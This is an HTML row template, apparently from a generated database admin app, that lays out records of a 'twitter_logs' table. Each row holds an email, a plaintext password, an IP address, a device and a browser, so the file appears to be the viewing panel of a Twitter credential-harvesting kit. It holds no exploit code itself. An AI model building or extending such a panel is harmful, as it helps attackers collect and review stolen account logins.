<!-- Edit this file to change the layout of each record in the table view -->
<!-- To disable clicking of a field, remove the  and  formatters around it-->

<!-- If you wish to hide the table view header that contains the column titles, -->
<!-- add the following to the twitter_logs_init() hook (in hooks/twitter_logs.php file) -->
<!--     $options->ShowTableHeader = 0;     -->

		<td id="twitter_logs-id-<%%VALUE(id)%%>" class="twitter_logs-id text-right"><%%VALUE(id)%%></td>
		<td id="twitter_logs-ip-<%%VALUE(id)%%>" class="twitter_logs-ip"><%%VALUE(ip)%%></td>
		<td id="twitter_logs-time-<%%VALUE(id)%%>" class="twitter_logs-time"><%%VALUE(time)%%></td>
		<td id="twitter_logs-email-<%%VALUE(id)%%>" class="twitter_logs-email"><%%VALUE(email)%%></td>
		<td id="twitter_logs-password-<%%VALUE(id)%%>" class="twitter_logs-password"><%%VALUE(password)%%></td>
		<td id="twitter_logs-status-<%%VALUE(id)%%>" class="twitter_logs-status"><%%VALUE(status)%%></td>
		<td id="twitter_logs-status_info-<%%VALUE(id)%%>" class="twitter_logs-status_info"><%%VALUE(status_info)%%></td>
		<td id="twitter_logs-device-<%%VALUE(id)%%>" class="twitter_logs-device"><%%VALUE(device)%%></td>
		<td id="twitter_logs-browser-<%%VALUE(id)%%>" class="twitter_logs-browser"><%%VALUE(browser)%%></td>
		<td id="twitter_logs-mode-<%%VALUE(id)%%>" class="twitter_logs-mode"><%%VALUE(mode)%%></td>
		<td id="twitter_logs-user_id-<%%VALUE(id)%%>" class="twitter_logs-user_id"><%%VALUE(user_id)%%></td>
		<td id="twitter_logs-source_id-<%%VALUE(id)%%>" class="twitter_logs-source_id"><%%VALUE(source_id)%%></td>
